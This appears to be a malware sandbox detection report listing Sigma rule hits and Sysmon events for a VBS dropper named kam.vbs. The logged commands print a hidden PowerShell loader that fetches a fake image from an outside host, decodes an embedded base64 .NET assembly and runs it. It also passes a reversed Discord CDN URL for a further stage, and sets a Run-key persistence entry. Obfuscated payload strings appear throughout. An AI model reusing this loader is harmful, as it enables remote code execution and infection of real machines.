DgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMetho
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
        Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6272, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49710
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kam.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kam.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kam.vbs", ProcessId: 6272, ProcessName: wscript.exe
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\cognitivo.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5308, TargetFilename: C:\ProgramData\cognitivo.vbs
        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6272, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49710
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 616, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs, ProcessId: 5308, ProcessName: powershell.exe
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMetho
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMetho
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kam.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kam.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kam.vbs", ProcessId: 6272, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4D